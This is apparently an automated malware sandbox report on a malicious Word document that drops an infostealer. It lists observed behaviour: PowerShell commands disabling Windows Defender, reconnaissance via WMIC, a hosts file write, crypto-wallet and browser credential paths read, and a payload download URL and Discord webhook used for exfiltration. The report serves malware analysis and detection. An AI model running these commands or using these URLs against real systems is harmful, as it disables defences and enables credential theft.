                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Modifies the hosts file
                  Source: C:\7037005\vhcst.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe'Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayNameJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                  Source: C:\2716439\vhcst.exeQueries volume information: C:\2716439\vhcst.exe VolumeInformationJump to behavior
                  Source: C:\7037005\vhcst.exeQueries volume information: C:\7037005\vhcst.exe VolumeInformationJump to behavior
                  Source: C:\7037005\vhcst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\7037005\vhcst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\7037005\vhcst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\7037005\vhcst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                  Source: C:\7037005\vhcst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\7037005\vhcst.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies the hosts file
                  Source: C:\7037005\vhcst.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: powershell.exe, 00000019.00000002.2166752071.0000023BFD7F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2166752071.0000023BFD82E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F8369D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F8369D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F8369D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .C:\Users\user\AppData\Roaming\Binance\wallets8
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F8369D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\walletss a
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\7037005\vhcst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\7037005\vhcst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                  Source: C:\7037005\vhcst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                  Source: C:\7037005\vhcst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\7037005\vhcst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
                  Source: C:\7037005\vhcst.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: Yara matchFile source: 4.0.vhcst.exe.23fba420000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2223963813.0000021F8382B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vhcst.exe PID: 7848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vhcst.exe PID: 7916, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scr, type: DROPPED
                  Source: Yara matchFile source: C:\2716439\vhcst.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information42
                  Scripting                  		Valid Accounts2
                  Windows Management Instrumentation                  		42
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  File and Directory Permissions Modification                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		3
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Extra Window Memory Injection                  		31
                  Disable or Modify Tools                  		LSASS Memory23
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		12
                  Registry Run Keys / Startup Folder                  		11
                  Process Injection                  		11
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin SharesData from Network Shared Drive4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell                  		Login Hook12
                  Registry Run Keys / Startup Folder                  		1
                  Timestomp                  		NTDS131
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture115
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Extra Window Memory Injection                  		Cached Domain Credentials41
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  Remote System Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562811 Sample: 5QnwxSJVyX Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 56 templatesmetadata.office.net 2->56 58 ip-api.com 2->58 60 2 other IPs or domains 2->60 78 Suricata IDS alerts for network traffic 2->78 80 Antivirus / Scanner detection for submitted sample 2->80 82 Multi AV Scanner detection for dropped file 2->82 84 16 other signatures 2->84 9 WINWORD.EXE 172 457 2->9         started        signatures3 process4 dnsIp5 62 files.catbox.moe 108.181.20.35, 443, 49735 ASN852CA Canada 9->62 46 C:\7037005\vhcst.exe, PE32 9->46 dropped 48 C:\2716439\vhcst.exe, PE32 9->48 dropped 50 C:\Users\user\AppData\Local\...\b5uubc[1].zip, Zip 9->50 dropped 88 Document exploit detected (creates forbidden files) 9->88 90 Office process queries suspicious COM object (likely to drop second stage) 9->90 14 vhcst.exe 14 13 9->14         started        19 vhcst.exe 1 9->19         started        file6 signatures7 process8 dnsIp9 64 ip-api.com 208.95.112.1, 49803, 80 TUT-ASUS United States 14->64 66 discord.com 162.159.136.232, 443, 49809, 49810 CLOUDFLARENETUS United States 14->66 52 C:\ProgramData\Microsoft\...\SYTv5.scr, PE32 14->52 dropped 54 C:\Windows\System32\drivers\etc\hosts, ASCII 14->54 dropped 68 Multi AV Scanner detection for dropped file 14->68 70 Suspicious powershell command line found 14->70 72 Found many strings related to Crypto-Wallets (likely being stolen) 14->72 76 6 other signatures 14->76 21 powershell.exe 14->21         started        24 powershell.exe 14->24         started        26 WMIC.exe 14->26         started        28 5 other processes 14->28 74 Machine Learning detection for dropped file 19->74 file10 signatures11 process12 signatures13 86 Loading BitLocker PowerShell Module 21->86 30 conhost.exe 21->30         started        32 WmiPrvSE.exe 21->32         started        34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        38 conhost.exe 28->38         started        40 conhost.exe 28->40         started        42 conhost.exe 28->42         started        44 2 other processes 28->44 process14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  5QnwxSJVyX.doc51%VirustotalBrowse
                  5QnwxSJVyX.doc100%AviraHEUR/Macro.Downloader
                  5QnwxSJVyX.doc100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scr100%Joe Sandbox ML
                  C:\2716439\vhcst.exe100%Joe Sandbox ML
                  C:\2716439\vhcst.exe100%Joe Sandbox ML
                  C:\2716439\vhcst.exe50%ReversingLabsByteCode-MSIL.Trojan.Zilla
                  C:\2716439\vhcst.exe54%VirustotalBrowse
                  C:\7037005\vhcst.exe50%ReversingLabsByteCode-MSIL.Trojan.Zilla
                  C:\7037005\vhcst.exe54%VirustotalBrowse
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scr50%ReversingLabsByteCode-MSIL.Trojan.Zilla

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://crl.microsoft)0%Avira URL Cloudsafe
                  http://www.mic.B0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  files.catbox.moe
                  		108.181.20.35
                  		truefalse
                    		high
                    discord.com
                    		162.159.136.232
                    		truefalse
                      		high
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://files.catbox.moe/b5uubc.zipfalse
                          		high
                          https://discord.com/api/webhooks/1307747947399741462/ke8UE548A61Hf_m1cpanGTjUrsXfghQotpegEAB6XvUfFSq5b5Q9claDeBbFwCxoUc2ffalse
                            		high
                            http://ip-api.com/json/?fields=225545false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1863497642.000002C110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B56E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE6A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000015.00000002.1966120315.000002D2B52BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://discord.comvhcst.exe, 00000006.00000002.2223963813.0000021F83A7B000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://discord.com/api/v10/users/SYTv5.scr.6.drfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.2053945057.0000023BE5303000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
